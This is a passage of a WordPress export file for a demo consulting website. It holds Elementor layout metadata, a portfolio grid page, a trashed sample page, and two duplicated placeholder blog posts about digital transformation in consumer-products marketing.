_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/</link>
		<pubDate>Fri, 11 Sep 2020 07:25:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=847</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project2-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project2-1200x1200.jpg 1200w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>847</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:25:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:25:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-grid]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"0238f9e","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"513ab33","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e2dfe3b","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"5d7a201","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"position":"","filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#4B83FC99"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:14:"subtitle_style";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:21:"overlay_style_section";a:2:{s:8:"position";i:1;s:18:"overlay_background";i:1;}s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Sample Page</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/sample-page__trashed/</link>
		<pubDate>Fri, 16 Oct 2020 09:32:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?page_id=2</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:paragraph -->
<p>This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote"><p>Hi there! I'm a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin' caught in the rain.)</p></blockquote>
<!-- /wp:quote -->

<!-- wp:paragraph -->
<p>...or something like this:</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>
<!-- /wp:quote -->

<!-- wp:paragraph -->
<p>As a new WordPress user, you should go to <a href="http://wpdemo.archiwp.com/maxbizz-consulting/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 09:32:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 09:32:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[sample-page__trashed]]></wp:post_name>
		<wp:status><![CDATA[trash]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[publish]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_time]]></wp:meta_key>
		<wp:meta_value><![CDATA[1609213416]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_desired_post_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[sample-page]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Entering the Next Phase of Digital Transformation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/entering-the-next-phase-of-digital-transformation/</link>
		<pubDate>Mon, 18 Dec 2017 04:13:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=413</guid>
		<description></description>
		<content:encoded><![CDATA[<p><span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.</p>
<p><span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em></p>
<p><img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" /></p>
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.</p>
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”<br /><cite>DAVID OSWALD</cite></p>
</blockquote>
<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.</p>
<p><em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em></p>

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>413</wp:post_id>
		<wp:post_date><![CDATA[2017-12-18 04:13:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2017-12-18 04:13:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_format" nicename="post-format-audio"><![CDATA[Audio]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="trading"><![CDATA[trading]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_audio]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/139083759]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[digital-transformation-roadmap-enablers]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>In Media, Trimming Costs Boosts Value Transform</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/in-media-trimming-costs-boosts-value-transform/</link>
		<pubDate>Tue, 09 Jan 2018 08:49:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=423</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>423</wp:post_id>
		<wp:post_date><![CDATA[2018-01-09 08:49:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-01-09 08:49:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-link"><![CDATA[Link]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>How to Write a Successful Grant Application</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/how-to-write-a-successful-grant-application/</link>
